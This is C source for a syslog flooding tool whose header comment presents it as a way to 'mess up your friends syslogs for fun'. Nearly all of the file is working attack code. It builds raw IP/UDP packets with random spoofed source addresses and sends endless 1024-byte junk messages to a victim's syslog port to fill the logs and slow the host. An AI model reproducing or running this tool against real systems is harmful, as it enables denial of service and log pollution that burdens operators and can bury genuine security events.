/* * syslogd-DOS.c * * Mess up your friends syslogs for fun! * * lore * * Note: syslogd must be running with the -r option on Linux, * or -u on BSD * * Note also: Not only is the box slowed down by logging all of this * crap, it also reverse resolves all the IPs, slowing it down even * more. * */ #include #include #include #include #include #include #include #include #include #include #include #define TRUE (0x00000001) #define FALSE (0x00000000) #define ERR (0xffffffff) #define SYSLOG_PORT 514 #define __BSD_SOURCE /* The BSD ip header is prettier */ #define IP_SIZE (sizeof(ip_h)) #define UDP_SIZE (sizeof(udp_h)) #define DATA_SIZE (1024) #define IP_OFF (0) #define UDP_OFF (IP_SIZE) #define DATA_OFF (UDP_OFF + UDP_SIZE) #define PSIZE (IP_SIZE + UDP_SIZE + DATA_SIZE) typedef struct ip ip_h; typedef struct udphdr udp_h; typedef char data_h; typedef u_short port_t; typedef u_long ip_t; typedef long sock_t; int main __P ((int, char * *)); char * random_message __P ((char *)); int spoof_udp_packet __P ((sock_t, ip_t, ip_t, port_t, char *, char *)); ip_t res __P ((char *)); u_short generate_checksum __P ((u_short *, int)); int main (int argc, char * * argv) { sock_t fd; char * yes = "1"; ip_t from, victim; port_t port; char p[PSIZE]; char mesg[DATA_SIZE]; if (argc < 2) { fprintf(stderr, "Usage: %s [port]\n", *argv); exit(EXIT_FAILURE); } else if ((victim = res(argv[1])) == ERR) { fprintf(stderr, "Could not resolve '%s': %s\n", argv[1], strerror(errno)); exit(EXIT_FAILURE); } else if (!(port = (argc > 2) ? atoi(argv[2]) : SYSLOG_PORT)) { fprintf(stderr, "Bad port '%s'\n", argv[2]); exit(EXIT_FAILURE); } else if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERR) { fprintf(stderr, "Could not create socket: %s\n", strerror(errno)); exit(EXIT_FAILURE); } else if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, (char *)&yes, sizeof(yes))) { fprintf(stderr, "Could not set socket options: %s\n", strerror(errno)); exit(EXIT_FAILURE); } srand((unsigned)time(NULL)); fprintf(stderr, "syslogd-DoS.c by lore \n"); fprintf(stderr, "Hitting %s:%d\n", argv[1], port); while (1) { from = rand() % 9999999 + 1; if ((spoof_udp_packet(fd, from, victim, port, p, random_message(mesg))) == ERR) { fprintf(stderr, "Could not send packet: %s\n", strerror(errno)); exit(EXIT_FAILURE); } fprintf(stderr, "."); } } char * random_message (char * mesg) { int i; memset(mesg, 0, DATA_SIZE); for (i = 0; i < DATA_SIZE; ++i) { mesg[i] = rand() % 255 + 1; } return (mesg); } int spoof_udp_packet (sock_t fd, ip_t from, ip_t to, port_t port, char * p, char * data) { ip_h * ip_ptr; udp_h * udp_ptr; data_h * data_ptr; struct sockaddr_in sa; memset(p, 0, PSIZE); ip_ptr = (ip_h *)(p + IP_OFF); udp_ptr = (udp_h *)(p + UDP_OFF); data_ptr = (data_h *)(p + DATA_OFF); ip_ptr->ip_hl = 5; ip_ptr->ip_v = 4; ip_ptr->ip_tos = 0; ip_ptr->ip_len = PSIZE; ip_ptr->ip_id = rand() % 31337 + 1; ip_ptr->ip_off = 0; ip_ptr->ip_ttl = 255; ip_ptr->ip_p = IPPROTO_UDP; ip_ptr->ip_sum = 0; // ip_ptr->ip_sum = generate_checksum((u_short *)ip_ptr, IP_SIZE); ip_ptr->ip_src.s_addr = from; ip_ptr->ip_dst.s_addr = to; udp_ptr->source = htons(514); udp_ptr->dest = htons(514); udp_ptr->len = htons(UDP_SIZE + DATA_SIZE); udp_ptr->check = generate_checksum((u_short *)ip_ptr, PSIZE); //IP_SIZE + //UDP_SIZE + DATA_SIZE); strcpy(data_ptr, data); sa.sin_port = htons(514); sa.sin_addr.s_addr = to; sa.sin_family = AF_INET; return (sendto(fd, p, PSIZE, 0, (struct sockaddr *)&sa, sizeof(struct sockaddr_in))); } ip_t res (char * host) { struct in_addr addr; struct hostent * hp; if ((addr.s_addr = inet_addr(host)) == ERR) { if (!(hp = gethostbyname(host))) return (ERR); memcpy(&addr.s_addr, hp->h_addr, hp->h_length); } return (addr.s_addr); } u_short generate_checksum (u_short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)addr; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } /* EOF */